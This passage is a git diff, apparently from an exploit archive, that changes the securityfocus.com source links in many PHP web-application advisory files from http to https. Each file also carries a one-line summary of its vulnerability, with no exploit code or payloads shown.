TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29587.txt b/exploits/php/webapps/29587.txt index 9d9162b0f..5cc9704ee 100644 --- a/exploits/php/webapps/29587.txt +++ b/exploits/php/webapps/29587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29588.txt b/exploits/php/webapps/29588.txt index 1be8071b6..366ac5a57 100644 --- a/exploits/php/webapps/29588.txt +++ b/exploits/php/webapps/29588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29589.txt b/exploits/php/webapps/29589.txt index 9ecac6625..d4061d202 100644 --- a/exploits/php/webapps/29589.txt +++ b/exploits/php/webapps/29589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29590.txt b/exploits/php/webapps/29590.txt index 6ebd2d106..e29def753 100644 --- a/exploits/php/webapps/29590.txt +++ b/exploits/php/webapps/29590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29591.txt b/exploits/php/webapps/29591.txt index 8ec996ba2..10ecf2c3c 100644 --- a/exploits/php/webapps/29591.txt +++ b/exploits/php/webapps/29591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29592.txt b/exploits/php/webapps/29592.txt index 1fb1e0dea..ba1b3ab5f 100644 --- a/exploits/php/webapps/29592.txt +++ b/exploits/php/webapps/29592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29593.txt b/exploits/php/webapps/29593.txt index 9acc7b644..7185ad365 100644 --- a/exploits/php/webapps/29593.txt +++ b/exploits/php/webapps/29593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29598.txt b/exploits/php/webapps/29598.txt index 488143198..c07665989 100644 --- a/exploits/php/webapps/29598.txt +++ b/exploits/php/webapps/29598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22534/info +source: https://www.securityfocus.com/bid/22534/info WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29599.txt b/exploits/php/webapps/29599.txt index 82d2bbfe8..efbd67af6 100644 --- a/exploits/php/webapps/29599.txt +++ b/exploits/php/webapps/29599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22537/info +source: https://www.securityfocus.com/bid/22537/info TaskFreak! is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29602.txt b/exploits/php/webapps/29602.txt index cf204e0ec..6ce9cfc97 100644 --- a/exploits/php/webapps/29602.txt +++ b/exploits/php/webapps/29602.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22559/info +source: https://www.securityfocus.com/bid/22559/info WebTester is prone to multiple input-validation issues, including multiple cross-site scripting and multiple SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29604.txt b/exploits/php/webapps/29604.txt index 5441b1a70..e2d00685c 100644 --- a/exploits/php/webapps/29604.txt +++ b/exploits/php/webapps/29604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22575/info +source: https://www.securityfocus.com/bid/22575/info ibProArcade is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29605.txt b/exploits/php/webapps/29605.txt index b0a7bdf8f..bdb21f00f 100644 --- a/exploits/php/webapps/29605.txt +++ b/exploits/php/webapps/29605.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22577/info +source: https://www.securityfocus.com/bid/22577/info Deskpro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29606.txt b/exploits/php/webapps/29606.txt index 53e9aced7..668ef6606 100644 --- a/exploits/php/webapps/29606.txt +++ b/exploits/php/webapps/29606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22578/info +source: https://www.securityfocus.com/bid/22578/info Calendar Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29608.txt b/exploits/php/webapps/29608.txt index 71f6b8385..df9b426a8 100644 --- a/exploits/php/webapps/29608.txt +++ b/exploits/php/webapps/29608.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22588/info +source: https://www.securityfocus.com/bid/22588/info CedStat is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29609.txt b/exploits/php/webapps/29609.txt index 69f334ef6..58e061338 100644 --- a/exploits/php/webapps/29609.txt +++ b/exploits/php/webapps/29609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22589/info +source: https://www.securityfocus.com/bid/22589/info Meganoide's news is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29610.txt b/exploits/php/webapps/29610.txt index 745bf3a4d..4154610c7 100644 --- a/exploits/php/webapps/29610.txt +++ b/exploits/php/webapps/29610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22590/info +source: https://www.securityfocus.com/bid/22590/info Ezboo webstats is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access. diff --git a/exploits/php/webapps/29615.txt b/exploits/php/webapps/29615.txt index 06b573832..113369837 100644 --- a/exploits/php/webapps/29615.txt +++ b/exploits/php/webapps/29615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22611/info +source: https://www.securityfocus.com/bid/22611/info Powerschool is prone to an information-disclosure vulnerability because the application discloses information about administrative session variables. diff --git a/exploits/php/webapps/29621.txt b/exploits/php/webapps/29621.txt index c4903e231..d892722fc 100644 --- a/exploits/php/webapps/29621.txt +++ b/exploits/php/webapps/29621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22635/info +source: https://www.securityfocus.com/bid/22635/info MyCalendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29624.txt b/exploits/php/webapps/29624.txt index 2c5b413c1..27062b186 100644 --- a/exploits/php/webapps/29624.txt +++ b/exploits/php/webapps/29624.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22653/info +source: https://www.securityfocus.com/bid/22653/info CedStat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29625.txt b/exploits/php/webapps/29625.txt index eb2df2ab2..d86a28402 100644 --- a/exploits/php/webapps/29625.txt +++ b/exploits/php/webapps/29625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22655/info +source: https://www.securityfocus.com/bid/22655/info phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29626.txt b/exploits/php/webapps/29626.txt index 9a65a0856..1303846d2 100644 --- a/exploits/php/webapps/29626.txt +++ b/exploits/php/webapps/29626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22655/info +source: https://www.securityfocus.com/bid/22655/info phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29627.php b/exploits/php/webapps/29627.php index bfe8f1f16..ae4618be0 100644 --- a/exploits/php/webapps/29627.php +++ b/exploits/php/webapps/29627.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22661/info +source: https://www.securityfocus.com/bid/22661/info Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29628.txt b/exploits/php/webapps/29628.txt index 87760ef70..1c56f7a76 100644 --- a/exploits/php/webapps/29628.txt +++ b/exploits/php/webapps/29628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22661/info +source: https://www.securityfocus.com/bid/22661/info Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29629.txt b/exploits/php/webapps/29629.txt index 2450d57ff..a3b09de5c 100644 --- a/exploits/php/webapps/29629.txt +++ b/exploits/php/webapps/29629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22661/info +source: https://www.securityfocus.com/bid/22661/info Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29631.txt b/exploits/php/webapps/29631.txt index e568e2a2e..1e995385a 100644 --- a/exploits/php/webapps/29631.txt +++ b/exploits/php/webapps/29631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22667/info +source: https://www.securityfocus.com/bid/22667/info Pyrophobia is prone to multiple input-validation vulnerabilities, including multiple local file-include issues and multiple cross-site scripting issues. diff --git a/exploits/php/webapps/29632.txt b/exploits/php/webapps/29632.txt index 07e60b754..9bc1554ba 100644 --- a/exploits/php/webapps/29632.txt +++ b/exploits/php/webapps/29632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22667/info +source: https://www.securityfocus.com/bid/22667/info Pyrophobia is prone to multiple input-validation vulnerabilities, including multiple local file-include issues and multiple cross-site scripting issues. diff --git a/exploits/php/webapps/29634.txt b/exploits/php/webapps/29634.txt index 19ac35fdf..dc27c4e68 100644 --- a/exploits/php/webapps/29634.txt +++ b/exploits/php/webapps/29634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22669/info +source: https://www.securityfocus.com/bid/22669/info Simple Plantilla PHP is prone to multiple input-validation issues, including a local file-include vulnerability and an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/29635.txt b/exploits/php/webapps/29635.txt index 66b1b213e..2f2c6439d 100644 --- a/exploits/php/webapps/29635.txt +++ b/exploits/php/webapps/29635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22670/info +source: https://www.securityfocus.com/bid/22670/info Pheap is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29636.txt b/exploits/php/webapps/29636.txt index 821387222..fa495bb80 100644 --- a/exploits/php/webapps/29636.txt +++ b/exploits/php/webapps/29636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22675/info +source: https://www.securityfocus.com/bid/22675/info LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue. diff --git a/exploits/php/webapps/29637.txt b/exploits/php/webapps/29637.txt index 7a037ca1e..9f31e5689 100644 --- a/exploits/php/webapps/29637.txt +++ b/exploits/php/webapps/29637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22675/info +source: https://www.securityfocus.com/bid/22675/info LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue. diff --git a/exploits/php/webapps/29638.txt b/exploits/php/webapps/29638.txt index 391c2b0bf..e4c69212f 100644 --- a/exploits/php/webapps/29638.txt +++ b/exploits/php/webapps/29638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22675/info +source: https://www.securityfocus.com/bid/22675/info LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue. diff --git a/exploits/php/webapps/29639.txt b/exploits/php/webapps/29639.txt index 40b94f703..f1a50ac87 100644 --- a/exploits/php/webapps/29639.txt +++ b/exploits/php/webapps/29639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22675/info +source: https://www.securityfocus.com/bid/22675/info LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue. diff --git a/exploits/php/webapps/29640.txt b/exploits/php/webapps/29640.txt index b5f7e7650..f5163b267 100644 --- a/exploits/php/webapps/29640.txt +++ b/exploits/php/webapps/29640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22697/info +source: https://www.securityfocus.com/bid/22697/info Shop Kit Plus is prone to a local file-include vulnerability because it fails to adequately sanitize user-supplied data. diff --git a/exploits/php/webapps/29641.txt b/exploits/php/webapps/29641.txt index 39a7594c8..c4a1d851e 100644 --- a/exploits/php/webapps/29641.txt +++ b/exploits/php/webapps/29641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22698/info +source: https://www.securityfocus.com/bid/22698/info xt:Commerce is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29642.txt b/exploits/php/webapps/29642.txt index 4a4c074cc..984aafb37 100644 --- a/exploits/php/webapps/29642.txt +++ b/exploits/php/webapps/29642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22700/info +source: https://www.securityfocus.com/bid/22700/info Simple one-file gallery is prone to multiple input-validation vulnerabilities, including a local file-include issue and a cross-site scripting issue. diff --git a/exploits/php/webapps/29643.txt b/exploits/php/webapps/29643.txt index b4ab90757..9a706e0ad 100644 --- a/exploits/php/webapps/29643.txt +++ b/exploits/php/webapps/29643.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22700/info +source: https://www.securityfocus.com/bid/22700/info Simple one-file gallery is prone to multiple input-validation vulnerabilities, including a local file-include issue and a cross-site scripting issue. diff --git a/exploits/php/webapps/29644.txt b/exploits/php/webapps/29644.txt index 1fda828a8..ad1ffa3ba 100644 --- a/exploits/php/webapps/29644.txt +++ b/exploits/php/webapps/29644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22703/info +source: https://www.securityfocus.com/bid/22703/info picKLE is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29645.txt b/exploits/php/webapps/29645.txt index 1ece521c6..799181ceb 100644 --- a/exploits/php/webapps/29645.txt +++ b/exploits/php/webapps/29645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22704/info +source: https://www.securityfocus.com/bid/22704/info Active Calendar is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29646.txt b/exploits/php/webapps/29646.txt index 9a2cc287d..913db8586 100644 --- a/exploits/php/webapps/29646.txt +++ b/exploits/php/webapps/29646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29647.txt b/exploits/php/webapps/29647.txt index 0837dc36f..be80e8ac4 100644 --- a/exploits/php/webapps/29647.txt +++ b/exploits/php/webapps/29647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29648.txt b/exploits/php/webapps/29648.txt index e18309b98..10dc4c76d 100644 --- a/exploits/php/webapps/29648.txt +++ b/exploits/php/webapps/29648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29649.txt b/exploits/php/webapps/29649.txt index 8b96c7f84..335e2d1ab 100644 --- a/exploits/php/webapps/29649.txt +++ b/exploits/php/webapps/29649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29650.txt b/exploits/php/webapps/29650.txt index d4fec43e2..7b9b1b1c0 100644 --- a/exploits/php/webapps/29650.txt +++ b/exploits/php/webapps/29650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29651.txt b/exploits/php/webapps/29651.txt index ed587044e..da7a8f791 100644 --- a/exploits/php/webapps/29651.txt +++ b/exploits/php/webapps/29651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29652.txt b/exploits/php/webapps/29652.txt index efe088637..91bf04c5a 100644 --- a/exploits/php/webapps/29652.txt +++ b/exploits/php/webapps/29652.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29653.txt b/exploits/php/webapps/29653.txt index e044dcbe7..f7ccaee19 100644 --- a/exploits/php/webapps/29653.txt +++ b/exploits/php/webapps/29653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29658.txt b/exploits/php/webapps/29658.txt index 9c286f9cc..caf583183 100644 --- a/exploits/php/webapps/29658.txt +++ b/exploits/php/webapps/29658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22707/info +source: https://www.securityfocus.com/bid/22707/info PhotoStand is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29663.txt b/exploits/php/webapps/29663.txt index 2f8b65aaa..1c4944ee4 100644 --- a/exploits/php/webapps/29663.txt +++ b/exploits/php/webapps/29663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22722/info +source: https://www.securityfocus.com/bid/22722/info SolarPay is prone to a local file-include vulnerability because the utility fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29665.txt b/exploits/php/webapps/29665.txt index fecfa7386..ab9155f16 100644 --- a/exploits/php/webapps/29665.txt +++ b/exploits/php/webapps/29665.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22727/info +source: https://www.securityfocus.com/bid/22727/info SQLiteManager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29679.html b/exploits/php/webapps/29679.html index 60bd9b2fd..d6a7e8af4 100644 --- a/exploits/php/webapps/29679.html +++ b/exploits/php/webapps/29679.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22730/info +source: https://www.securityfocus.com/bid/22730/info PHPBB2 is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access. diff --git a/exploits/php/webapps/29680.html b/exploits/php/webapps/29680.html index 6d733e89e..a729f7135 100644 --- a/exploits/php/webapps/29680.html +++ b/exploits/php/webapps/29680.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22731/info +source: https://www.securityfocus.com/bid/22731/info SQLiteManager is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29681.txt b/exploits/php/webapps/29681.txt index 011875c02..cf3ef8245 100644 --- a/exploits/php/webapps/29681.txt +++ b/exploits/php/webapps/29681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22733/info +source: https://www.securityfocus.com/bid/22733/info Pagesetter is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29682.txt b/exploits/php/webapps/29682.txt index d95a6041e..0ac16d255 100644 --- a/exploits/php/webapps/29682.txt +++ b/exploits/php/webapps/29682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22735/info +source: https://www.securityfocus.com/bid/22735/info Wordpress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29684.txt b/exploits/php/webapps/29684.txt index c3de6c007..9f0b82f72 100644 --- a/exploits/php/webapps/29684.txt +++ b/exploits/php/webapps/29684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22738/info +source: https://www.securityfocus.com/bid/22738/info Wordpress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29694.txt b/exploits/php/webapps/29694.txt index e24c3a759..fac498256 100644 --- a/exploits/php/webapps/29694.txt +++ b/exploits/php/webapps/29694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22774/info +source: https://www.securityfocus.com/bid/22774/info Serendipity is affected by an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29696.txt b/exploits/php/webapps/29696.txt index b93040e31..244e1b388 100644 --- a/exploits/php/webapps/29696.txt +++ b/exploits/php/webapps/29696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22781/info +source: https://www.securityfocus.com/bid/22781/info aWebNews is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29697.txt b/exploits/php/webapps/29697.txt index 6f37bfcf9..5fa493556 100644 --- a/exploits/php/webapps/29697.txt +++ b/exploits/php/webapps/29697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22783/info +source: https://www.securityfocus.com/bid/22783/info Built2Go News Manager Blog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29698.txt b/exploits/php/webapps/29698.txt index 1be58b40f..0378dfde7 100644 --- a/exploits/php/webapps/29698.txt +++ b/exploits/php/webapps/29698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22783/info +source: https://www.securityfocus.com/bid/22783/info Built2Go News Manager Blog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29700.txt b/exploits/php/webapps/29700.txt index e9bbdc2fe..7663a4ce3 100644 --- a/exploits/php/webapps/29700.txt +++ b/exploits/php/webapps/29700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22796/info +source: https://www.securityfocus.com/bid/22796/info Woltlab Burning Board is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29701.txt b/exploits/php/webapps/29701.txt index 9bc64410e..f09b285d4 100644 --- a/exploits/php/webapps/29701.txt +++ b/exploits/php/webapps/29701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22797/info +source: https://www.securityfocus.com/bid/22797/info An attacker compromised the source code for Wordpress 2.1.1 and altered it to include a malicious backdoor. This backdoor introduces a code-execution vulnerability that will let remote users inject PHP code or execute operating system commands. diff --git a/exploits/php/webapps/29702.txt b/exploits/php/webapps/29702.txt index 44f9e50be..5c5832501 100644 --- a/exploits/php/webapps/29702.txt +++ b/exploits/php/webapps/29702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22797/info +source: https://www.securityfocus.com/bid/22797/info An attacker compromised the source code for Wordpress 2.1.1 and altered it to include a malicious backdoor. This backdoor introduces a code-execution vulnerability that will let remote users inject PHP code or execute operating system commands. diff --git a/exploits/php/webapps/29703.txt b/exploits/php/webapps/29703.txt index 7a01da9c3..94bd9beae 100644 --- a/exploits/php/webapps/29703.txt +++ b/exploits/php/webapps/29703.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22799/info +source: https://www.securityfocus.com/bid/22799/info Tyger Bug Tracking System is prone to multiple input-validation vulnerabilities, including one SQL-injection issue and two cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29704.txt b/exploits/php/webapps/29704.txt index 8c28fce71..b8a1bb301 100644 --- a/exploits/php/webapps/29704.txt +++ b/exploits/php/webapps/29704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22799/info +source: https://www.securityfocus.com/bid/22799/info Tyger Bug Tracking System is prone to multiple input-validation vulnerabilities, including one SQL-injection issue and two cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29705.txt b/exploits/php/webapps/29705.txt index 4d318d9bd..292782c5e 100644 --- a/exploits/php/webapps/29705.txt +++ b/exploits/php/webapps/29705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22799/info +source: https://www.securityfocus.com/bid/22799/info Tyger Bug Tracking System is prone to multiple input-validation vulnerabilities, including one SQL-injection issue and two cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29715.txt b/exploits/php/webapps/29715.txt index 66bc47ad3..e79b218a8 100644 --- a/exploits/php/webapps/29715.txt +++ b/exploits/php/webapps/29715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22829/info +source: https://www.securityfocus.com/bid/22829/info ePortfolio is prone to a client-side input-validation vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29722.txt b/exploits/php/webapps/29722.txt index c975f26d7..b635f0c59 100644 --- a/exploits/php/webapps/29722.txt +++ b/exploits/php/webapps/29722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22894/info +source: https://www.securityfocus.com/bid/22894/info URLshrink Free is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29727.txt b/exploits/php/webapps/29727.txt index 58ba570c0..a6443fce6 100644 --- a/exploits/php/webapps/29727.txt +++ b/exploits/php/webapps/29727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22912/info +source: https://www.securityfocus.com/bid/22912/info Premod SubDog 2 is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29728.txt b/exploits/php/webapps/29728.txt index 92382ef8b..afec5dec2 100644 --- a/exploits/php/webapps/29728.txt +++ b/exploits/php/webapps/29728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22912/info +source: https://www.securityfocus.com/bid/22912/info Premod SubDog 2 is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29729.txt b/exploits/php/webapps/29729.txt index 7331b7eb4..2aa564942 100644 --- a/exploits/php/webapps/29729.txt +++ b/exploits/php/webapps/29729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22912/info +source: https://www.securityfocus.com/bid/22912/info Premod SubDog 2 is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29730.txt b/exploits/php/webapps/29730.txt index 189ee9b9d..55f283c15 100644 --- a/exploits/php/webapps/29730.txt +++ b/exploits/php/webapps/29730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22913/info +source: https://www.securityfocus.com/bid/22913/info DataLife Engine is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29731.txt b/exploits/php/webapps/29731.txt index fd358acfa..122180cdf 100644 --- a/exploits/php/webapps/29731.txt +++ b/exploits/php/webapps/29731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22913/info +source: https://www.securityfocus.com/bid/22913/info DataLife Engine is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29736.txt b/exploits/php/webapps/29736.txt index 5ee0ac921..009d7f81a 100644 --- a/exploits/php/webapps/29736.txt +++ b/exploits/php/webapps/29736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22928/info +source: https://www.securityfocus.com/bid/22928/info ClipShare is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29737.txt b/exploits/php/webapps/29737.txt index 5baf40939..985c0b61e 100644 --- a/exploits/php/webapps/29737.txt +++ b/exploits/php/webapps/29737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22937/info +source: https://www.securityfocus.com/bid/22937/info Weekly Drawing Contest is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29742.txt b/exploits/php/webapps/29742.txt index 458908a22..8aa57618f 100644 